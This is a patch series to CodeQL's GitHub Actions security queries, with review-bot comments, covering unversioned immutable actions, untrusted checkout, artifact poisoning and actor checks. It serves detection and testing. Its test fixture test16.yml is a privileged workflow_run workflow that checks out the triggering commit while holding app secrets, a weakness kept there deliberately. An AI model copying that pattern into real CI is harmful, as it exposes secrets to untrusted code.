ql/lib/codeql/actions/config/Config.qll | 2 +- .../UseOfUnversionedImmutableAction.qll | 11 +++++++ .../CWE-829/UnversionedImmutableAction.ql | 29 ++++--------------- .../actions/dangerous-git-checkout/action.yml | 2 +- .../UnversionedImmutableAction.expected | 19 ++++++++++++ .../CWE-829/UnversionedImmutableAction.qlref | 1 + 6 files changed, 38 insertions(+), 26 deletions(-) create mode 100644 ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll create mode 100644 ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref 
diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index a439f999623..a21f3e358d1 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -120,7 +120,7 @@ predicate vulnerableActionsDataModel( } /** - * MaD models for vulnerable actions + * MaD models for immutable actions * Fields: * - action: action name */ diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll new file mode 100644 index 00000000000..2be71612f26 --- /dev/null +++ b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll @@ -0,0 +1,11 @@ +import actions + +class UnversionedImmutableAction extends UsesStep { + string immutable_action; + + UnversionedImmutableAction() { + immutableActionsDataModel(immutable_action) and + this.getCallee() = immutable_action and + not this.getVersion().regexpMatch("^(v)?[0-9]+(\\.[0-9]+)*(\\.[xX])?$") + } +} diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql index d9a1394641f..0c6443bc3e6 100644 --- a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql @@ -2,7 +2,6 @@ * @name Unversioned Immutable Action * @description Using an Immutable Action without a semantic version tag opts out of the protections of Immutable Action * @kind problem - * @security-severity 5.0 * @problem.severity recommendation * @precision high * @id actions/unversioned-immutable-action 
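Review bot: `UnversionedImmutableAction` treats every ref that is not a version-like tag as unversioned, and that includes a full commit SHA. A step pinned by SHA is therefore reported, while the help file added for this query recommends exactly that pinning. If reporting SHA pins is intended, the class needs QLDoc saying so, for example `/** A step that uses an action listed in immutableActionsDataModel with a ref that is not a semantic version tag (branch names and commit SHAs included). */`. The pattern also accepts refs without the `v` prefix, which the earlier draft required; confirm such refs resolve to an immutable release. The field `immutable_action` is used only inside the characteristic predicate and could be an `exists` variable instead.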
@@ -12,27 +11,9 @@ */ import actions +import codeql.actions.security.UseOfUnversionedImmutableAction -bindingset[version] -private predicate isSemanticVersioned(string version) { version.regexpMatch("^v[0-9]+(\\.[0-9]+)*(\\.[xX])?$") } - -bindingset[repo] -private predicate isTrustedOrg(string repo) { - exists(string org | org in ["actions", "github", "advanced-security", "octokit"] | repo.matches(org + "/%")) -} - -from UsesStep uses, string repo, string version, Workflow workflow, string name -where - uses.getCallee() = repo and - uses.getEnclosingWorkflow() = workflow and - ( - workflow.getName() = name - or - not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name - ) and - uses.getVersion() = version and - not isTrustedOrg(repo) and - not isPinnedCommit(version) -select uses.getCalleeNode(), - "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + - "', not a pinned commit hash", uses, uses.toString() +from UnversionedImmutableAction step +select step, + "The workflow is using an immutable action ($@) without versinoning so it doesn't work", step, + step.getCallee() \ No newline at end of file diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml index 57058e7a076..cd4f0fe660a 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml @@ -4,7 +4,7 @@ runs: using: "composite" steps: - name: Checkout repo - uses: actions/checkout@v4 + uses: actions/checkout@4 with: ref: ${{ github.event.pull_request.head.sha }} fetch-depth: 2 
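Review bot: The alert text in the `select` has a typo (`versinoning`) and ends with "so it doesn't work", which disagrees with the `@description` saying the step opts out of Immutable Action protections. Suggested wording: `"The workflow uses the immutable action $@ without a semantic version tag, which opts out of Immutable Action protections."`. The same string is recorded in all 19 rows of `UnversionedImmutableAction.expected`, so that file needs regenerating once the message changes. The query file also ends without a trailing newline.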
diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected new file mode 100644 index 00000000000..5ae46862fb4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected 
@@ -0,0 +1,19 @@ +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages | +| .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow is using an 
immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:43:9:47:2 | Uses Step | actions/upload-pages-artifact | +| .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | actions/deploy-pages | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | actions/checkout | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test8.yml:20:9:26:6 | Uses Step | actions/checkout | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test9.yml:11:9:16:6 | Uses Step | actions/checkout | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test11.yml:84:7:90:4 | Uses Step | actions/checkout | +| .github/workflows/test12.yml:86:7:92:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test12.yml:86:7:92:4 | Uses Step | actions/checkout | +| .github/workflows/test14.yml:101:7:105:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test14.yml:101:7:105:4 | Uses Step | actions/checkout | +| .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:60:7:65:4 | Uses Step | 
The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout | diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref new file mode 100644 index 00000000000..6ce4123fa5e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref @@ -0,0 +1 @@ +Security/CWE-829/UnversionedImmutableAction.ql \ No newline at end of file From e03ba558129fbf8de923df7b3d17b54a6fcc639d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 19 Oct 2024 17:01:29 +0200 Subject: [PATCH 0601/1267] Account for checkout path on Untrusted Checkout Critical --- .../security/ArtifactPoisoningQuery.qll | 7 +- .../actions/security/PoisonableSteps.qll | 2 + .../CWE-829/UntrustedCheckoutCritical.ql | 33 +- .../CWE-829/.github/workflows/test16.yml | 294 ++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 18 ++ 5 files changed, 347 insertions(+), 7 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 9355462962d..48bca0e46f9 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
@@ -276,7 +276,12 @@ class ArtifactPoisoningSink extends DataFlow::Node { ) or poisonable.(UsesStep) = this.asExpr() and - download.getPath() = "GITHUB_WORKSPACE/" + ( + not poisonable instanceof LocalActionUsesStep and + download.getPath() = "GITHUB_WORKSPACE/" + or + isSubpath(poisonable.(LocalActionUsesStep).getPath(), download.getPath()) + ) ) } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 5e62aa675ee..99d844bae79 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -49,4 +49,6 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { class LocalActionUsesStep extends PoisonableStep, UsesStep { LocalActionUsesStep() { this.getCallee().matches("./%") } + + string getPath() { result = normalizePath(this.getCallee()) } } diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 37628a29489..4b87ad00c0f 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql 
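Review bot: The new disjunction in `ArtifactPoisoningSink` has no comment explaining its two cases, and the same test is repeated for checkouts in `UntrustedCheckoutCritical.ql` later in this commit. Add a comment above it such as `// third-party actions are assumed to run on the workspace root; a local action (./path) is only poisonable when the artifact lands over its directory`, and consider a single shared predicate that takes the step and the path. `LocalActionUsesStep.getPath()` in the `PoisonableSteps.qll` hunk also needs QLDoc stating which form `normalizePath` returns, because `isSubpath` compares it with `download.getPath()`, which this hunk writes as `GITHUB_WORKSPACE/`. Both helpers are defined outside the hunk, as is the start of the enclosing predicate.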
@@ -20,12 +20,33 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from PRHeadCheckoutStep checkout, PoisonableStep step, Event event +from PRHeadCheckoutStep checkout, PoisonableStep poisonable, Event event where // the checkout is followed by a known poisonable step - checkout.getAFollowingStep() = step and + checkout.getAFollowingStep() = poisonable and + ( + poisonable instanceof Run and + ( + // Check if the poisonable step is a local script execution step + // and the path of the command or script matches the path of the downloaded artifact + isSubpath(poisonable.(LocalScriptExecutionRunStep).getPath(), checkout.getPath()) + or + // Checking the path for non local script execution steps is very difficult + not poisonable instanceof LocalScriptExecutionRunStep + // Its not easy to extract the path from a non-local script execution step so skipping this check for now + // and isSubpath(poisonable.(Run).getWorkingDirectory(), checkout.getPath()) + ) + or + poisonable instanceof UsesStep and + ( + not poisonable instanceof LocalActionUsesStep and + checkout.getPath() = "GITHUB_WORKSPACE/" + or + isSubpath(poisonable.(LocalActionUsesStep).getPath(), checkout.getPath()) + ) + ) and // the checkout occurs in a privileged context - inPrivilegedContext(step, event) and - not exists(ControlCheck check | check.protects(step, event, "untrusted-checkout")) -select step, checkout, step, "Execution of untrusted code on a privileged workflow. $@", event, - event.getLocation().getFile().toString() + inPrivilegedContext(poisonable, event) and + not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout")) +select poisonable, checkout, poisonable, "Execution of untrusted code on a privileged workflow. $@", + event, event.getLocation().getFile().toString() 
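Review bot: For third-party `uses:` steps the new condition requires `checkout.getPath() = "GITHUB_WORKSPACE/"`, so a PR head checked out with `path:` and followed by a poisonable action that is pointed at that directory is no longer reported, whereas before this change any following poisonable step was. If that trade-off is deliberate, state it in a comment and pin it with a fixture; otherwise keep those steps in the results at lower precision. The comment on the `LocalScriptExecutionRunStep` branch still says "downloaded artifact" where this query deals with the checkout path. The commented-out `isSubpath(poisonable.(Run).getWorkingDirectory(), checkout.getPath())` line is better written as a TODO than left as dead code.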
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml new file mode 100644 index 00000000000..4ceb9a4c72f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml 
@@ -0,0 +1,294 @@ +name: Post-Build +run-name: Post-Build on ${{ github.event.workflow_run.head_branch }} +on: + workflow_run: + types: [ 'completed' ] + workflows: + - Build +concurrency: + # Cancel concurrent jobs on pull_request but not push, by including the run_id in the concurrency group for the latter. + group: post-build-${{ github.event.workflow_run.event == 'push' && github.run_id || 'pr' }}-${{ github.event.workflow_run.head_branch }} + cancel-in-progress: true + +env: + COMPOSER_ROOT_VERSION: "dev-trunk" + SUMMARY: Post-Build run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for Build run [#${{ github.event.workflow_run.id }}](${{ github.event.workflow_run.html_url }}) + +permissions: + actions: read + contents: read + pull-requests: read + +# Note the job logic here is a bit unusual. That's because this workflow is triggered by `workflow_run`, and so is not shown on the PR by default. +# Instead we have to manually report back, including where we could normally just skip or let a failure be handled. +# - If the "Build" job failed, we need to set our status as failed too (build_failed). +# - If the find_artifact job fails for some reason, we need a step to explicitly report that back. +# - If no plugins are found, we need to explicitly report back a "skipped" status. +# - And the upgrade_test job both explicitly sets "in progress" at its start and updates at its end. +# +# If you're wanting to add a new check, you'd want to do the following: +# - Add a step in the `setup` workflow to create your check, and a corresponding output for later steps to have the ID. +# - Add a step in the `build_failed` workflow to set your run to cancelled. +# - Add a job to run whatever tests you need to run, with steps similar to the `upgrade_test` workflow's "Get token", "Notify check in progress", and "Notify final status". 
+# - Add a step in the `no_plugins` workflow to set your run to skipped if your job only runs when there are plugins built. + +jobs: + setup: + name: Setup + runs-on: ubuntu-latest + timeout-minutes: 2 # 2022-12-20: Seems like it should be fast. + outputs: + upgrade_check: ${{ steps.upgrade_check.outputs.id }} + steps: + - name: Log info + run: | + echo "$SUMMARY" >> $GITHUB_STEP_SUMMARY + + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Create "Test plugin upgrades" check' + id: upgrade_check + uses: ./.github/actions/check-run + with: + name: Test plugin upgrades + sha: ${{ github.event.workflow_run.head_sha }} + status: queued + title: Test queued... + summary: | + ${{ env.SUMMARY }} + token: ${{ steps.get_token.outputs.token }} + + build_failed: + name: Handle build failure + runs-on: ubuntu-latest + needs: setup + if: github.event.workflow_run.conclusion != 'success' + timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. + steps: + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Mark "Test plugin upgrades" cancelled' + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: cancelled + title: Build failed + summary: | + ${{ env.SUMMARY }} + + Post-build run aborted because the build did not succeed. + token: ${{ steps.get_token.outputs.token }} + + find_artifact: + name: Find artifact + runs-on: ubuntu-latest + needs: setup + if: github.event.workflow_run.conclusion == 'success' + timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. 
+ outputs: + zip_url: ${{ steps.run.outputs.zip_url }} + any_plugins: ${{ steps.run.outputs.any_plugins }} + steps: + - uses: actions/checkout@v4 + + - name: Find artifact + id: run + env: + TOKEN: ${{ github.token }} + URL: ${{ github.event.workflow_run.artifacts_url }} + run: | + for (( i=1; i<=5; i++ )); do + [[ $i -gt 1 ]] && sleep 10 + echo "::group::Fetch list of artifacts (attempt $i/5)" + JSON="$(curl -v -L --get \ + --header "Authorization: token $TOKEN" \ + --url "$URL" + )" + echo "$JSON" + echo "::endgroup::" + ZIPURL="$(jq -r '.artifacts | map( select( .name == "jetpack-build" ) ) | sort_by( .created_at ) | last | .archive_download_url // empty' <<<"$JSON")" + PLUGINS="$(jq -r '.artifacts[] | select( .name == "plugins.tsv" )' <<<"$JSON")" + if [[ -n "$ZIPURL" ]]; then + break + fi + done + [[ -z "$ZIPURL" ]] && { echo "::error::Failed to find artifact."; exit 1; } + echo "Zip URL: $ZIPURL" + echo "zip_url=${ZIPURL}" >> "$GITHUB_OUTPUT" + if [[ -z "$PLUGINS" ]]; then + echo "Any plugins? No" + echo "any_plugins=false" >> "$GITHUB_OUTPUT" + else + echo "Any plugins? Yes" + echo "any_plugins=true" >> "$GITHUB_OUTPUT" + fi + + - name: Get token + id: get_token + if: ${{ ! success() }} + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + - name: 'Mark "Test plugin upgrades" failed' + if: ${{ ! success() }} + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: failure + title: Failed to find build artifact + summary: | + ${{ env.SUMMARY }} + + Post-build run aborted because the "Find artifact" step failed. + token: ${{ steps.get_token.outputs.token }} + + no_plugins: + name: Handle no-plugins + runs-on: ubuntu-latest + needs: [ setup, find_artifact ] + if: needs.find_artifact.outputs.any_plugins == 'false' + timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. 
+ steps: + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Mark "Test plugin upgrades" skipped' + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: skipped + title: No plugins were built + summary: | + ${{ env.SUMMARY }} + + Post-build run skipped because no plugins were built. + token: ${{ steps.get_token.outputs.token }} + + upgrade_test: + name: Test plugin upgrades + runs-on: ubuntu-latest + needs: [ setup, find_artifact ] + if: needs.find_artifact.outputs.any_plugins == 'true' + timeout-minutes: 15 # 2022-08-26: Successful runs seem to take about 6 minutes, but give some extra time for the downloads. + services: + db: + image: mariadb:lts + env: + MARIADB_ROOT_PASSWORD: wordpress + ports: + - 3306:3306 + options: --health-cmd="healthcheck.sh --su-mysql --connect --innodb_initialized" --health-interval=10s --health-timeout=5s --health-retries=5 + container: + image: ghcr.io/automattic/jetpack-wordpress-dev:latest + env: + WP_DOMAIN: localhost + WP_ADMIN_USER: wordpress + WP_ADMIN_EMAIL: wordpress@example.com + WP_ADMIN_PASSWORD: wordpress + WP_TITLE: Hello World + MYSQL_HOST: db:3306 + MYSQL_DATABASE: wordpress + MYSQL_USER: root + MYSQL_PASSWORD: wordpress + HOST_PORT: 80 + ports: + - 80:80 + steps: + - uses: actions/checkout@v4 + with: + path: trunk + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.workflow_run.head_commit.id }} + path: commit + + - name: Get token + id: get_token + uses: ./trunk/.github/actions/gh-app-token + env: + # Work around a weird node 16/openssl 3 issue in the docker env + OPENSSL_CONF: '/dev/null' + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: Notify check in progress + uses: ./trunk/.github/actions/check-run + with: + id: ${{ 
needs.setup.outputs.upgrade_check }} + status: in_progress + title: Test started... + summary: | + ${{ env.SUMMARY }} + + See run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for details. + token: ${{ steps.get_token.outputs.token }} + + - name: Download build artifact + env: + TOKEN: ${{ github.token }} + ZIPURL: ${{ needs.find_artifact.outputs.zip_url }} + shell: bash + run: | + for (( i=1; i<=2; i++ )); do + [[ $i -gt 1 ]] && sleep 10 + echo "::group::Downloading artifact (attempt $i/2)" + curl -v -L --get \ + --header "Authorization: token $TOKEN" \ + --url "$ZIPURL" \ + --output "artifact.zip" + echo "::endgroup::" + if [[ -e "artifact.zip" ]] && zipinfo artifact.zip &>/dev/null; then + break + fi + done + [[ ! -e "artifact.zip" ]] && { echo "::error::Failed to download artifact."; exit 1; } + unzip artifact.zip + tar --xz -xvvf build.tar.xz build + + - name: Setup WordPress + run: trunk/.github/files/test-plugin-update/setup.sh + + - name: Prepare plugin zips + id: zips + run: trunk/.github/files/test-plugin-update/prepare-zips.sh + + - name: Test upgrades + id: tests + run: trunk/.github/files/test-plugin-update/test.sh + + - name: Notify final status + if: always() + uses: ./trunk/.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: ${{ job.status }} + title: ${{ job.status == 'success' && 'Tests passed' || job.status == 'cancelled' && 'Cancelled' || 'Tests failed' }} + summary: | + ${{ env.SUMMARY }} + + ${{ steps.zips.outputs.info }}${{ steps.tests.outputs.info }} + + See run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for details. + token: ${{ steps.get_token.outputs.token }} diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 2a401dee18a..2380236acca 100644 
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -244,6 +244,24 @@ edges | .github/workflows/test15.yml:236:7:242:4 | Run Step | .github/workflows/test15.yml:242:7:250:4 | Uses Step | | .github/workflows/test15.yml:242:7:250:4 | Uses Step | .github/workflows/test15.yml:250:7:270:4 | Uses Step | | .github/workflows/test15.yml:250:7:270:4 | Uses Step | .github/workflows/test15.yml:270:7:271:45 | Run Step | +| .github/workflows/test16.yml:43:9:47:6 | Run Step | .github/workflows/test16.yml:47:9:49:6 | Uses Step | +| .github/workflows/test16.yml:47:9:49:6 | Uses Step | .github/workflows/test16.yml:49:9:56:6 | Uses Step: get_token | +| .github/workflows/test16.yml:49:9:56:6 | Uses Step: get_token | .github/workflows/test16.yml:56:9:68:2 | Uses Step: upgrade_check | +| .github/workflows/test16.yml:75:9:77:6 | Uses Step | .github/workflows/test16.yml:77:9:84:6 | Uses Step: get_token | +| .github/workflows/test16.yml:77:9:84:6 | Uses Step: get_token | .github/workflows/test16.yml:84:9:96:2 | Uses Step | +| .github/workflows/test16.yml:106:9:108:6 | Uses Step | .github/workflows/test16.yml:108:9:140:6 | Run Step: run | +| .github/workflows/test16.yml:108:9:140:6 | Run Step: run | .github/workflows/test16.yml:140:9:147:6 | Uses Step: get_token | +| .github/workflows/test16.yml:140:9:147:6 | Uses Step: get_token | .github/workflows/test16.yml:147:9:160:2 | Uses Step | +| .github/workflows/test16.yml:167:9:169:6 | Uses Step | .github/workflows/test16.yml:169:9:176:6 | Uses Step: get_token | +| .github/workflows/test16.yml:169:9:176:6 | Uses Step: get_token | .github/workflows/test16.yml:176:9:188:2 | Uses Step | +| .github/workflows/test16.yml:218:9:221:6 | Uses Step | .github/workflows/test16.yml:221:9:226:6 | Uses Step | +| .github/workflows/test16.yml:221:9:226:6 | Uses Step | .github/workflows/test16.yml:226:9:236:6 | Uses Step: get_token | +| .github/workflows/test16.yml:226:9:236:6 | Uses Step: get_token | .github/workflows/test16.yml:236:9:248:6 | Uses Step | +| .github/workflows/test16.yml:236:9:248:6 | Uses Step 
| .github/workflows/test16.yml:248:9:270:6 | Run Step | +| .github/workflows/test16.yml:248:9:270:6 | Run Step | .github/workflows/test16.yml:270:9:273:6 | Run Step | +| .github/workflows/test16.yml:270:9:273:6 | Run Step | .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | +| .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | +| .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | .github/workflows/test16.yml:281:9:294:54 | Uses Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | From fc5a6703b34b5e50d72a670886d6af900a994ab8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 19 Oct 2024 17:01:47 +0200 Subject: [PATCH 0602/1267] Add github.event.sender.login as an Actor source --- ql/lib/codeql/actions/security/ControlChecks.qll | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 760efaf5e7e..6293e4d6f3d 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -179,7 +179,8 @@ class ActorIfCheck extends ActorCheck instanceof If { .regexpFind([ "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", "\\bgithub\\.event\\.head_commit\\.author\\.name\\b", - "\\bgithub\\.event\\.commits.*\\.author\\.name\\b" + "\\bgithub\\.event\\.commits.*\\.author\\.name\\b", + "\\bgithub\\.event\\.sender\\.login\\b" ], _, _) ) or From 229d42b51516df3a59a5aa600640282b4b7d3d8c Mon Sep 17 00:00:00 2001 
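Review bot: The added `github.event.sender.login` pattern in `ActorIfCheck` comes with no fixture; the commit touches only `ControlChecks.qll`. The `regexpFind` shown here only looks for a mention of the expression, and `UntrustedCheckoutCritical.ql` drops results for which a `ControlCheck` protects the step, so presumably any `if:` that references the sender will suppress alerts. A test workflow with a sender-login condition, together with the matching `.expected` update, would pin the intended behaviour. The enclosing predicate starts and ends outside the hunk.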
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 21 Oct 2024 11:05:06 +0200 Subject: [PATCH 0603/1267] Add sonar-scanner-action as a poisonable step --- ql/lib/ext/config/poisonable_steps.yml | 1 + .../CWE-829/.github/workflows/test17.yml | 23 +++++++++++ .../CWE-829/.github/workflows/test18.yml | 41 +++++++++++++++++++ .../ArtifactPoisoningCritical.expected | 4 ++ .../CWE-829/ArtifactPoisoningMedium.expected | 3 ++ .../CWE-829/UnpinnedActionsTag.expected | 2 + .../UntrustedCheckoutCritical.expected | 4 ++ 7 files changed, 78 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index addadd75c87..2ee9af6904e 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -10,6 +10,7 @@ extensions: - ["ruby/setup-ruby"] - ["actions/jekyll-build-pages"] - ["qcastel/github-actions-maven/actions/maven"] + - ["sonarsource/sonarcloud-github-action"] - addsTo: pack: github/actions-all extensible: poisonableCommandsDataModel diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml new file mode 100644 index 00000000000..f679b772e34 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml 
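Review bot: The new `poisonable_steps.yml` row is all lowercase, while the action is published as `SonarSource/sonarcloud-github-action` and workflows commonly spell it that way. How this model is compared with `getCallee()` is not visible here (the immutable-action class earlier in this series uses plain equality), so confirm the match is case-insensitive or add a fixture with the mixed-case spelling. `test17.yml` and `test18.yml` only exercise the lowercase form. The commit subject says `sonar-scanner-action`, which is not the name added.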
